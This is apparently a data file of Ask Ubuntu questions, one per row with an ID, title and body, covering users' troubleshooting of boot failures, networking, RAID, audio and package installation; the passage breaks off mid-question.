492699	ubuntu not loading - kernel panic	installed ubuntu on new laptop with win8.1 installed from usb key . worked fine and could dual boot . installed updates and rebooted when instructed got following message when booting into ubuntu : kernel panic - not syncing : fatal exception in interrupt drm_kms_helper : panic occured , switching back to text console ( does not switch back and just hangs ) reinstalled ubuntu but exact same happened although new version was installed on new partitions windows 8.1 loads fine how do i fix ?
492700	apache hadoop 2.4 installation failure on ubuntu 14.04	i have tried to install the apache hadoop 2.4 on ubuntu 14.04 ( 32 bit ) os all steps went good but when i try to start the hadoop services i am getting the following error message : warn util.nativecodeloader : unable to load native-hadoop library for your platform ... using builtin-java classes where applicable i tried to re-compile the native libraries for 32 bit jvm but it also fails and when i try to run the $ jps command it shows only namenode running . what should i do now ?
492703	slow ubuntu desktop 14.04	i 've just installed ubuntu 14.04 but the desktop appears to be really laggy ... ie opening the unity menu or dragging windows etc ... i installed the classic desktop using these instructions : http : //www.omgubuntu.co.uk/2014/04/ubuntu-14-04-classic-gnome-flashback-session which was better but i do actually like unity and would like to use it if possible . the machine i am running is a lenovo thinkcentre m55 . intel速 core 2 duo processor e6400 integrated intel graphics media accelerator 3000 3gb ram i 'm guessing my machine is n't up to it but i thought i would ask if there are any suggestions ?
492704	e4rat + ubuntu 13.10 not booting	i followed instructions on http : //www.howtogeek.com/69753/how-to-cut-your-linux-pcs-boot-time-in-half-with-e4rat/ until this point : now , letâs restart our machine with sudo shutdown -r now and log in normally to complete the last phase . but now i ca n't start any more , is there anything that i can do , i have files on my hard disk that will not open while i run ubuntu from usb , and i do n't want to reinstall ubuntu and lose files . it get 's this far : [ e4rat-preload ] open /varlib/e4rat/startup.log [ e4rat-preload ] 2820 files scanned [ e4rat-preload ] pre-loading i-nodes ... [ e4rat-preload ] execute '/sbin/init ' ... [ e4rat-preload ] pre-loading file content ... [ e4rat-preload ] succesfully transferred files into page cache _
492705	qml what to use to store int numbers textinput or textfield	what is good to use on a ubuntu phone app that needs 25 variables to get input that are int numbers . text fields or text input . right now i 'm using text inputs to create the 25 ids that i 'm going to use . here is an example of my code : rectangle { width : 40 ; height : 17 ; radius : 20.0 id : rec2 x : 102 y : 50 color : `` # f0ebeb '' border.color : `` # 000000 '' // width , height textinput { id : q2 text : `` 0 '' anchors.centerin : parent cursorvisible : true } } rectangle { width : 40 ; height : 17 ; radius : 20.0 id : rec3 x : 102 y : 67 color : `` # f0ebeb '' border.color : `` # 000000 '' // width , height textinput { id : q3 text : `` 0 '' anchors.centerin : parent cursorvisible : true } } rectangle { width : 40 ; height : 17 ; radius : 20.0 id : rec4 x : 102 y : 84 color : `` # f0ebeb '' border.color : `` # 000000 '' // width , height textinput { id : q4 text : `` 0 '' anchors.centerin : parent cursorvisible : true } }
492710	what to do to make a standalone session works on 14.04 ?	i have followed this topic to make a standalone session it worked with me on ubuntu 11.10 but when i tried it on ubuntu 14.04 it looks like no unity where used and my desktop where back and there is nothing on the all screen . and here is my ~/.compiz-session so i want to know what is the wrong or missing thing that i have to make to be working ?
492712	turning off auto login	i have a ubuntu 12.04 and have removed the gui essentially making it a server . i have been trying to figure out how to turn off the auto login on the tty1 command line that it boots too . the other consoles do not have auto login setup .
492713	how to download just one package from a ppa ?	i would like to download the project-x package for trusty from a ppa to replace the one supplied with the system . how i can download it ( as a deb file , for example ) which i can then install from ? i do n't want to add the ppa to my software sources as i do not want to upgrade all the other packages in that ppa .
492715	how to check gigabit connection between 2 ( x ) ubuntu computers ?	i have an ethernet 10/100 switch . this connection is working properly ( to my cablemodem router , so all computers are connected to internet ) . i have just bought a gigabit switch that i am about to use instead of the other . the intented purpose is to be able to share quickly between these computers . how to check that i am achieving gigabit speed with my new switch between my xubuntu / ubuntu 14.04 computers in the lan ? i am not sharing yet between computers or created and workgroup , as i still need to learn how to do it . this is just information for anyone who will want to help to keep in mind . thanks alex
492726	how to combine/merge pages in pdf file ( gui ) ?	i want to combine two pages in pdf file into single page . consider i have a pdf file in which there are two pages , now i want to combine two pages into ( single ) one , no-matter for ( how-long ) page-size ! how to do that ? note : this question is not about combine two pdf files or merging pdf files or adding pages in pdf files . also visit question about scaling page in pdf .
492728	xmonad keyboard not working ( macbook pro )	i 've installed ubuntu 14.04 on my macbook pro retina ( 11,1 ) and it all worked swimmingly . then i tried installing xmonad , selected it once from my lightdm manager and now it loads by default . ( the loading by default is my bad since i told ubuntu to not show lightdm when i turned on the machine , but rather log me in automatically ) . my problem is that alt-shift-enter or alt-shift-q does not work in xmonad . this is likely because i have a mac keyboard . what are the correct key combinations for a macbook in xmonad ? ps . i can only assume xmonad actually starts ; i have no way of knowing since all i see is a black screen . it does however show the ubuntu logo if i power it off , so i assume it is running ubuntu with xmonad as the window manager . psps . i have no xmonad config file , to make sure it boots with the standard settings .
492730	can we login to the 'root ' ( not as root user but in the 'root ' user ) user in ubuntu ?	i want to login as user 'root ' in bash shell , but do not know the password of it . here i am talking about the user which i have found in passwd as below : sudo cat /etc/passwd root : x:0:0 : root : /root : /bin/bash so , my basic question is that can we able to login as 'root ' user or not ? if yes and some know about it , let me know . thank you .
492731	error openning my hard-drive	i 'm trying to open my main hard drive ( on live environment - my ubuntu is on usb device ) but i got the following error : error mounting /dev/sda1 at /media/ubuntu/c0f89410f89406b6 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sda1 '' `` /media/ubuntu/c0f89410f89406b6 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda1 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . note that i have play with the partitons when trying install ubuntu ( it did n't happen himself ) . this error occur in ubuntu ( live ) and my win8 that is in the hard drive co n't booting becaus of this . what can i do ?
492733	how do i scale page in pdf files in ubuntu ? ( gui )	i want to scale page in pdf file . in other words i want to change in height & width of page in pdf file . how do i do that ? note : this question is not about scale page during/for printing ! also visit question about combine two pages in pdf .
492734	about is not working in my ubuntu app for desktop	i have developed the same app `` mybrowser '' told by jono bacon in his tutorial . but when i want to see about it is throwing the following error : gtk.window.__init__ ( self , type=type , **kwds ) /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `aboutdialog ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) traceback ( most recent call last ) : file `` /home/navneet/apps/ubuntu apps/mybrowser/mybrowser_lib/window.py '' , line 85 , in on_mnu_about_activate about = self.aboutdialog ( ) # pylint : disable=e1102 file `` /home/navneet/apps/ubuntu apps/mybrowser/mybrowser_lib/aboutdialog.py '' , line 21 , in __new__ new_object.finish_initializing ( builder ) attributeerror : 'nonetype ' object has no attribute 'finish_initializing'
492736	how to install postgressql-server	for ruby development on heroku i need to use postgresql , but when i do bundle install i see this message : you need to install postgresql-server-dev-x.y for building a server-side extension or libpq-dev for building a client-side application . checking for libpq-fe.h ... no ca n't find the 'libpq-fe.h header
492737	how to i merge 2 vmware disks in to a single one , on ubuntu	i have installed an ubuntu server on a vmware workstation with a space of 20gb storage as seen below : http : //i.stack.imgur.com/tncrv.png after the installation i 've attached another 40gb worth storage to the existing ubuntu server installation ( seen below ) : http : //i.stack.imgur.com/6mlpv.png now i want to add this 40gb to my / ( root ) directory it mean 's i want that my / directory became to 60g , like it will be resize from 20g to 60g ( 20g + 40g ) , i do n't know what should i do , can any body help me ? , my df -h result shows ; root @ userver : ~ # df -h filesystem size used avail use % mounted on /dev/sda1 18g 900m 16g 6 % / udev 990m 4.0k 990m 1 % /dev tmpfs 400m 308k 399m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 999m 0 999m 0 % /run/shm none 100m 0 100m 0 % /run/user root @ userver : ~ # it must be 60g ! i have no graphic mode , then i ca n't use gparted tools , i 'm just have ssh access ! did i must using lvm partition ? i do n't installed vmware tools on my ubuntu , did i must to install it ? finally on ubuntu command line , what should i do ? please help me step by step
492738	raid10 write speed decreased to normal ssd speed after rebuilding the array	os : ubuntu 14.04 lts software raid10 : 4x120gb intel 530 ssds server : hp proliant dl160 g6 fs : md0 : ext4/ md1 : swap test is made on fresh new install , before making any change to some package or reboot . writing speed decreased to the a normal ssd write speed ( in my case ) . bellow i add the stats/commands i performed . dd if=/dev/zero of=test bs=1048576 count=2048 2048+0 records in 2048+0 records out 2147483648 bytes ( 2.1 gb ) copied , 1.79013 s , 1.2 gb/s dd if=test of=/dev/null bs=1048576 2048+0 records in 2048+0 records out 2147483648 bytes ( 2.1 gb ) copied , 0.376622 s , 5.7 gb/s everythig is looking good so far . now i took out and put back in one of the disks : mdadm -- fail /dev/md0 /dev/sda1 mdadm -- remove /dev/md0 /dev/sda1 mdadm -- fail /dev/md1 /dev/sda2 mdadm -- remove /dev/md1 /dev/sda2 mdadm -- add /dev/md0 /dev/sda1 mdadm -- add /dev/md1 /dev/sda2 after rebuilding the array : dd if=/dev/zero of=test bs=1048576 count=2048 2048+0 records in 2048+0 records out 2147483648 bytes ( 2.1 gb ) copied , 9.5621 s , 225 mb/s dd if=test of=/dev/null bs=1048576 2048+0 records in 2048+0 records out 2147483648 bytes ( 2.1 gb ) copied , 0.375301 s , 5.7 gb/s my arrays look like this : cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid10 ] [ raid6 ] [ raid5 ] [ raid4 ] md0 : active raid10 sdc1 [ 2 ] sdb1 [ 1 ] sda1 [ 4 ] sdd1 [ 3 ] 195177472 blocks super 1.2 512k chunks 2 near-copies [ 4/4 ] [ uuuu ] md1 : active raid10 sdd2 [ 5 ] sda2 [ 4 ] sdc2 [ 2 ] sdb2 [ 1 ] 39095296 blocks super 1.2 512k chunks 2 near-copies [ 4/4 ] [ uuuu ] i do n't know where to start now . do i miss to set some flag or something ?
492739	launcher , top bar missing & can not close , maximize , or move windows	i opened my laptop after a month of inactivity ( dell , running 14.04 ) . it was in the suspended state during this time , and upon reopening it , the laptop functioned perfectly . after this initial use , i shut down the laptop . when i booted it the next time , the launcher bar had disappeared along with the top bar , leaving me a blank desktop ( only the default ubuntu background remained ) . i was able to create a new folder and navigate myself through to the chromium application . i have made multiple attempts to try and fix this problem with the responses already existing on askubuntu . but my problem remains . i 've tried to mess around with ccsm , and tweaking unity , but to no avail . i have little experience with ubuntu , but i will follow whatever instructions you provide . please help ! update i know this question has been marked as a duplicate , but i 've honestly tried the solutions on that page . since the original post , ive moved to a different wifi zone , and as such am unable to connect to wifi from the computer . i 'm posting this update from my phone . i request that those who marked it as a duplicate undo that action because it may prevent my question from being answered .
492740	ipv6 network unreachable	some strange problem here , i have got an ipv6 address by dhcp , however , ping ipv6.google.com gets network unreachable . other people in the same house using windows7 has ipv6 working fine . so , there seems to exists some mistake in my ubuntu configuration . btw , there is vmware installed in my computer , and my windows7 in vmware can also get ipv6 address and work fine ( using bridged network ) . i will give some informations here . ifconfig -a eth0 eth0 link encap : ethernet hwaddr 00:25:22 : de:5b:50 inet addr:114.212.203.128 bcast:114.212.207.255 mask:255.255.248.0 inet6 addr : 2001 : da8:1007:4001 : :3:373d/128 scope : global inet6 addr : fe80 : :225:22ff : fede:5b50/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:78747 errors:0 dropped:0 overruns:0 frame:0 tx packets:87348 errors:0 dropped:0 overruns:0 carrier:3 collisions:0 txqueuelen:1000 rx bytes:52280256 ( 52.2 mb ) tx bytes:15413471 ( 15.4 mb ) ping6 -i eth0 2404:6800:4005:805 : :100e ping 2404:6800:4005:805 : :100e ( 2404:6800:4005:805 : :100e ) from 2001 : da8:1007:4001 : :3:373d eth0 : 56 data bytes from 2001 : da8:1007:4001 : :3:373d icmp_seq=1 destination unreachable : address unreachable from 2001 : da8:1007:4001 : :3:373d icmp_seq=2 destination unreachable : address unreachable from 2001 : da8:1007:4001 : :3:373d icmp_seq=3 destination unreachable : address unreachable from 2001 : da8:1007:4001 : :3:373d icmp_seq=4 destination unreachable : address unreachable ^c -- - 2404:6800:4005:805 : :100e ping statistics -- - 6 packets transmitted , 0 received , +4 errors , 100 % packet loss , time 4999ms ip -6 route 2001 : da8:1007:4001 : :3:373d dev eth0 proto kernel metric 256 fe80 : :/64 dev vmnet1 proto kernel metric 256 fe80 : :/64 dev vmnet8 proto kernel metric 256 fe80 : :/64 dev eth0 proto kernel metric 256 default via fe80 : :da49 : bff : fe91 : e98f dev eth0 proto static metric 1 default via fe80 : :da49 : bff : fe91 : e98f dev eth0 proto ra metric 1024 expires 380sec ip -6 neigh fe80 : :da49 : bff : fe91 : e98f dev eth0 router incomplete cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback iface lo inet6 loopback so , does any one has ideas ?
492744	how do i automatically remap buttons on my mouse at startup ?	i struggled with this over the weekend , and have found a decent solution that is an accretion of various tips i 've found in other threads . so , i 'm asking a pre-answered question here in order to share my experience . see answer below .
492746	can shotwell publish raw cr2 photos ?	can shotwell be configured to publish the cr2 file to google instead of the jpeg ? i was extremely disappointed to discover that all the time i spend publishing photos was wasted because it used the jpeg versions ! unfortunately the files it uploads are named img_xxx.cr2.jpg so that when you 're viewing file details on google , it hides the jpg extention and unless you notice the file is too small or download the full version you 'll never know what happened . it would n't be quite as bad if the jpeg was a 100 % version , but it 's not . if i use lightroom the jpges are about 10 mb compared to shotwell 's 2 mb . these are the raw files supported : https : //support.google.com/picasa/answer/15625 ? hl=en
492749	ubuntu ec2 compatible kernels	i am trying to create an ubuntu 13.10 64 bit ami with the paravirtual type of virtualization . i have not had problems with the hvm virtualization . i ca n't figure out what kernel i need to use . for the ami regisrtation i use us-east-1 aki-919dcaf8 pv-grub-hd0_1.04-x86_64.gz . what kernel that supports pv-grub is supposed to be installed on the base ubuntu machine ? i have found this and tried linux-image-virtual for saucy , installed this package and it relies on the generic kernel . in this article some ec2 kernels are mentioned but i was unable to install them , there are some dependency issues and those kernels are quite old . ubuntu package search for `` linux-image-ec2 '' gives this result : lucid ( 10.04lts ) ( kernel ) : linux kernel image for ec2 machines 2.6.32.366.47 [ security ] : amd64 i386 . all my attempts failed . what am i doing wrong ?
492750	git prompt wo n't colorize	i want my git prompt in bash to colorize ( green for clean repos , red for dirty repos ) . right now , it shows plain white text no matter the git state of my cwd/repo . https : //github.com/mcandre/dotfiles/blob/master/.bashrc-wi # l135-l138
492751	remove/disabled printer from the list permenantly	i want to remove some printers which i see in system settings- > printers section . i edited the file /etc/cups/printer.conf and it removes it temporarily , but when i reboot the machine it seems that it adds the printers automatically from the network . how can i avoid this/ remove them permanently ? i tried with sudo lpadmin -x as well .
492752	huawei ( e173-u ) not working in ubuntu 14.04	i have recently installed ubuntu 14.04 . from the beginning of the installation i had a problem with my dongle . that is . when i first connect my modem ( after doing the necessary network setups ) it shows the modem . when i try to connect to the network , it just disappears from the network menu . then i have to remove the dongle couple of times and plug it to work . so i tried searching on the web & edited this file /lib/udev/rules.d/40-usb_modeswitch.rules # huawei e173 ( viettel 3g ) attr { idvendor } == '' 12d1 '' , attr { idproduct } == '' 1446 '' , run+= '' usb_modeswitch ' % b/ % k ' '' here i have replaced 1446 wih the previous value , the reason i chose 1446 is when i used the lssub command , i got a vendor id & prod . id . so i replaced them with this . my problem now is , the device is not recognized . even after several unplugs . so i need a way to fix it or bring the old /lib/udev/rules.d/40-usb_modeswitch.rules file . can anyone help me ?
492755	install multiple elasticsearch versions on 12.04	i have two projects using different versions of elasticsearch , the first uses 0.9.x and the second will use 1.2.x what would the best way to install both versions so i can work on the two projects ?
492757	how can i prevent xorg.conf from being overwritten	every once in a while , my xorg.conf is being replaced and my original xorg.conf is being backed up to xorg.conf.mmddyyyy . xorg.conf.04202014 xorg.conf.04262014 xorg.conf.05132014 xorg.conf.05212014 xorg.conf.06222014 xorg.conf.07012014 xorg.conf.07072014 that 's 7 times that it has happened over the last 4 months . i assume it happens after x gets upgraded . how can i stop this from happening ? it would be ideal if apt-get ( if it 's what 's doing this ) would prompt me showing me a diff of the old and new xorg.conf instead of just silently replacing my xorg.conf .
492759	ubuntu 14.04 jumping between wifi access points	at a large college campus i 've had spotty wifi access over the last two years . the output of dmesg -t contains numerous entries that look like this : wlan0 : deauthenticating from ma : ca : dd : re : ss by local choice ( reason=3 ) i talked to central it support and they said that probably is my laptop jumping between close by access points .
492760	ubuntu on my device	hope everything is well , actually im trying to install ubuntu on xolo x900 smartphone . it has intel 1.6 dual core atom processor , 1gb of ram 16gb storage , which meets the hardware requirement of ubuntu capability device and you also have mentioned ( http : //www.ubuntu.com/phone/operators-and-oems ) in your forum . so please guide me the steps to install ubuntu on this device thank you . awaiting for you positive reply thnk you .
492761	ubuntu 10.04 sublime text 2 installation error /usr/bin/dpkg returned an error code ( 1 )	i found a few topics on askubuntu regarding this problem but i 'm not sure how to solve it specifically towards sublime text 2 below is a question i asked on stackoverflow and a few attempts to fix this problem . i ca n't seem to find a solution to this problem so any help would be greatly appreciated . i 'm trying to install sublime text 2 for ubuntu 10.04 which should be straightforward . however , i get this error message when i try to complete install : setting up sublime-text ( 2.0.2-1~webupd8~3 ) ... cp : can not stat `/var/cache/sublime-text-2/sublime text 2/* ' : no such file or directory dpkg : error processing sublime-text ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : sublime-text e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've checked my directory and i 'm 100 % certain that this directory exists : /var/cache/sublime-text-2/sublime text 2/*' the contents of the directory contain these files inside : sublime text 2.0.2 x64.tar.bz2 this naturally leads me to believe that the error is /usr/bin/dpkg . i 've tried looking into it and have already attempted these commands : sudo apt-get clean sudo apt-get update & & sudo apt-get upgrade and then : sudo dpkg -- configure -a sudo apt-get -f install the errors are the same for these commands . a last ditch effort would be to try this solution that i found from the following link : potential sublime text 2 ubuntu solution the post says to implement this solution for the problem files which in my case would be /var/cache/sublime-text-2/sublime text 2/* sudo dpkg -i -- force-overwrite < filename > sudo apt-get -f install for the above two files youâd execute : sudo dpkg -i -- force-overwrite /var/cache/apt/archives/file sudo apt-get -f install i tried this and i still get the same error . sudo dpkg -i -- force-overwrite /var/cache/sublime-text-2/sublime text 2/* did i type this incorrectly ? i have a feeling that the astericks is incorrect . any help would be appreciated . i 'm running out of options . thanks .
492764	ca n't add software source	i 've tried to add software source but `` add source '' button is unavialable.i ca n't click on it . i 've tried also to add source by using command line but it 's not useful sudo‬‬ ‫‪add-apt-repository‬‬ ‫‪ppa : n-muench/burg‬‬ s‫‪udo‬‬ : command not found another time ‫‪sudo‬‬ ‫‪add-apt-repository‬‬ ‫‪deb‬‬ ‫‪http : //ppa.launchpad.net/n-muench/burg/ubuntu‬‬ natty‬‬ ‫‪main‬‬ sudo‬‬ : command not found what 's the solution ?
492768	mouse selects without clicking , like a webpage	when my dell system xps l322x laptop , running ubuntu 12.04 , is connected to the dell p2314h external monitor ( this model does not have touch screen ) , the mouse selects anything it hovers over without actually clicking . note : monitor connected to laptop 's mini display port with a dvi cable and a dvi/mini-display-port adapter . other notes : i have an external mouse and keyboard connected to a usb hub which is connected to one of the laptop 's two usb 3.0 ports . to avoid hibernating when laptop lid is closed , i set ignorelid=true in /etc/upower/upower.conf i looked at mouse selects everything on its own ; universal access 's hover click is off . i then checked https : //bugs.launchpad.net/ubuntu/+source/xorg-server/+bug/1002788 as well as http : //ubuntuforums.org/showthread.php ? p=9999160 which suggest it 's due to touchscreen ( again , this does n't have touchscreen ) and , therefore , to use : xinput set-prop 'name of my touchscreen device ' 'device enabled ' 0 ( after first showing list of input devices using : xinput -- list ) . but ... i do n't have touchscreen for this . output of xinput -- list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ usb optical mouse id=10 [ slave pointer ( 2 ) ] ⎜ ↳ cyps/2 cypress trackpad id=15 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ usb keyboard id=11 [ slave keyboard ( 3 ) ] ↳ usb keyboard id=12 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_1.3m id=13 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=14 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=16 [ slave keyboard ( 3 ) ]
492769	ca n't use internet with rtl-8139/8139c/8139c+ ?	i have a rtl-8139/8139c/8139c+ in my ubuntu 14 , but i ca n't use it . and it is not a wireless drive , but a cable internet . how can i use it ?
492775	add alias to root	i need to execute a command for my system to search for new sd cards and to be able to execute it i need to me logged on as root . simply using sudo with the command does not work . this is not a question of how to execute an alias with sudo rights ! i want to know how to add an alias to the root user so i can execute it after using sudo -i. i tried logging in to the root user and just adding the alias ( which works fine ) . the only problem is that the alias disappears after i log out from the terminal .
492777	adding kernel to a disk image without 'installing '	in order to download a disk image from my ubuntu 10.04 lts based vps , i setup ubuntu 14.04 lts ( in virtualbox ) and used dd over ssh . i wrote the image to a vdi drive , hoping to be able to boot it in another vm . to my surprise , the image i downloaded does not contain a kernel . ( seems my vps host boots the kernel externally to my installed os . ) i have the ubuntu 10.04 lts file system mounted in my ubuntu 14.04 install ( /mnt/tmp ) and wish to 'place ' all the kernel software onto it without having to install ( since 14.04 is the running os ) . [ added ] what i 'm thinking of doing is to install ubuntu 10.04 lts in another vm , then mount the drive on the ubuntu 14.04 vm alongside the vps image i downloaded . i would then copy all the files from the downloaded image on to the ubuntu 10.04 drive , after which i would revert back to the ubuntu 10.04 vm ( and hope it worked ) . another option would be to create a ubuntu 10.04 vm with two drives ( / and /boot ) . then replace the / drive with the image i downloaded . [ /added ] any advice on how to achieve this ? cheers , nap
492783	how to publish a jar application to ubuntu software center ?	i want to upload a simple desk toy to the ubuntu software center , i 've researched and i ca n't seem to find the answer . do i need to upload as .jar or .zip or .deb ? ? my jar file is an executable jar . when i try to upload it it says `` the upload does not appear to be a valid click package . '' on http : //developer.ubuntu.com/ side note : i am a windows 7 veteran and its my first time using ubuntu , these applications were made on eclipse in a windows 7 pc and the executable runs on ubuntu .
492786	question regarding dual booting ubuntu and windows 7	i know there have been many questions regarding this topic , but i am going to put a bit of a different spin on it ( hopefully ) . so i have a 500 gb hard drive , with some 438 free gb , all through windows 7 . researching how much space to allocate to ubuntu and windows 7 has yielded contradictory results . through the ubuntu prompt , will i have access to all 438 gb , or will i only have access to a small portion ? also , with this much space , any recommendations on how much space to allocate to each os ? one other question . there are two main ways to set up the partition for the dual boot . either through ubuntu 's prompt or by setting it up yourself . i planned on using ubuntu 's prompt , mainly because it seems like it works , and it seems safer than me poking around my hard drive . is this method `` safer '' ? in other words , what are the risks of partitioning my hard drive via ubuntu 's prompt ? thanks for all the help .
492793	corrupted `` /etc/ld.so.conf '' file , how can i fix it ?	i am trying to compile simple screen recorder in this link https : //github.com/maartenbaert/ssr . i had linker error due to wrong library path . while checking out library paths i noticed that i had corrupted /etc/ld.so.conf file , i have no idea how it happened but it turned out to be chinese . 湩汣摵⁥支捴氯⹤潳挮湯⹦⽤⸪潣普ਊ甯牳氯捯污氯扩 甯牳氯捯污氯扩ਊ would anybody post default contents of it ? edit : to my surprize i get correct paths with $ cat /etc/ld.so.conf include /etc/ld.so.conf.d/*.conf /usr/local/lib /usr/local/lib and i get chinese letters with sudo gedit /etc/ld.so.conf so , is it a gedit bug ? i read the content with sudo leafpad /etc/ld.so.conf again
492794	does a new grub install modify cleanly the master boot record ?	when you reinstall grub through the installer , does it automatically edit whatever existing boot record is there so that there is nothing left dangling ( code-wise ) ? or , do you actually need to clean things up in some manner ? ( this may apply to debian as well as any other debian-based linux that uses grub ) . thanks .
492795	what does wine really stand for ?	i know that this is not exactly the right place to ask , but it 's the only place i know where it is at least sort-of-a-good-place to ask . i have already googled and searched here , but i got multiple conflicting answers . one of them said `` windows emulator '' , another said `` wine is not an emulator '' ( which is kind of strange seeing its nature and general description ) , and i thought of it meaning `` windows internal native emulator '' . so what is the real answer ?
492797	backing up steam games+saved data to copy cloud storage	i am using xubuntu 14.04 . i have copy cloud storagehttps : //www.copy.com/home/ , and i would like to backup my games and their saves to cloud storage . because i ( used to ) reinstall often i put all items that i would rather not lose on copy cloud storage , so that when i install copy on a fresh install , all my files are restored . i would like to include steam games and game saves on my cloud storage ( even the game downloads that i have bought through steam ) . i would like to be able to reinstall linux and install copy and have all my files restored , and then be able to configure steam to use the games from copy and their saves . i would also like to be able to update steam games that i bought on the steam store even if i reinstall . if that is not possible , i would only like to be able to store my saves on the cloud . in case anybody will ask , i know about the steam cloud storage but i would rather use my own .
492800	wired connection problem ubuntu 14.04 lts	i recently added a partition to my computer with ubuntu 14.04 lts 64-bit . it is turbo-x dual-boot with windows 7 . the ethernet works good in windows but in ubuntu does not work . the wired connection is trying to connect to the switch all the time but it does not connect . george @ myia : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 00:90 : f5:8c:2e:04 inet6 addr : fe80 : :290 : f5ff : fe8c:2e04/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:72 errors:0 dropped:0 overruns:0 frame:0 tx packets:310 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4920 ( 4.9 kb ) tx bytes:56934 ( 56.9 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:410 errors:0 dropped:0 overruns:0 frame:0 tx packets:410 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:33513 ( 33.5 kb ) tx bytes:33513 ( 33.5 kb ) wlan0 link encap : ethernet hwaddr 00:1d : e0:84 : b6:39 inet addr:192.168.0.102 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :21d : e0ff : fe84 : b639/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:254 errors:0 dropped:0 overruns:0 frame:0 tx packets:318 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:45164 ( 45.1 kb ) tx bytes:38175 ( 38.1 kb ) george @ myia : ~ $ nm-tool networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : disconnected default : no hw address : 00:90 : f5:8c:2e:04 capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on - device : wlan0 [ mf60_b6ef5f ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : iwl4965 state : connected default : yes hw address : 00:1d : e0:84 : b6:39 capabilities : speed : 54 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *mf60_b6ef5f : infra , 78 : e8 : b6 : b6 : ef:5f , freq 2437 mhz , rate 54 mb/s , strength 79 wpa ipv4 settings : address : 192.168.0.102 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 george @ myia : ~ $ lspci -nn | grep ethernet 07:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 02 )
492802	byobu weird character	after the last byobu 's update , i realized that the weird character in bottom left of terminal was not repaired . this character is right or not ? see link below . ubuntu 14.04 ; language : english ( us ) ; regional formats : pt_br
492803	just now installed ubuntu 13.10 i dont know how to get top task bar	please help me how to get top task bar in ubuntu 13.10 i cant see that option in the setting
492804	how to allocate the unallocated space of windows partition	i have recently unallocated the windows partition in my pc to free the disk memory but i am not able to allocate the unallocated space made by deleting the windows partition this is a screenshot of gparted editor which shows what i have done how can i allocate the unallocated space created and then i would like merge that partition into ubuntu partition without eventually loosing the data present in ubuntu partition . *edit *edit2 edit4 edit 5
492805	pulseaudio + hfp profile in ubuntu	objective is to attend the call via bt paired devices using hfp steps done : a . the softwares used are -pulseaudio-4.99.2 -bluez-5.14 -ofono-1.14 b . the above mentioned application were started and then using bluetoothctl methods , i 've paired and connected the mobile to the ubuntu pc . c. call was made to the mobile . after the call was attended , i was trying to hear the audio via the headset connected to the ubuntu pc . but there was no audio heard . d. i 've tried to list the bluez sink and sources using the below command : pactl list short sources | grep bluez_source pactl list short sinks | grep -v monitor | grep alsa_output.pci e. then loopback the devices using the below command pactl load-module module-loopback source= [ btsource ] sink= [ sink ] f. i 've also edited /etc/bluetooth/audio.conf to enable [ general ] enable=gateway , source , socket , sink , media , headset please help me if i 've missed something . is there anything to be modified in the daemon.conf file ? i 'm also getting these logs in pulseaudio d : [ pulseaudio ] module-loopback.c : loopback overall latency is 43.55 ms + 335.02 ms + 26.97 ms = 405.54 ms d : [ pulseaudio ] module-loopback.c : should buffer 2112 bytes , buffered at minimum 3346 bytes i : [ pulseaudio ] module-loopback.c : new rate of 8061 hz not within 2â° of 7919 hz , forcing smaller adjustment d : [ pulseaudio ] module-loopback.c : [ alsa_output.pci-0000_00_1b.0.analog-stereo ] updated sampling rate to 7934 hz . d : [ pulseaudio ] module-loopback.c : loopback overall latency is 0.00 ms + 19584.88 ms + 0.00 ms = 19584.88 ms d : [ pulseaudio ] module-loopback.c : should buffer 96 bytes , buffered at minimum 154078 bytes w : [ pulseaudio ] module-loopback.c : sample rates too different , not 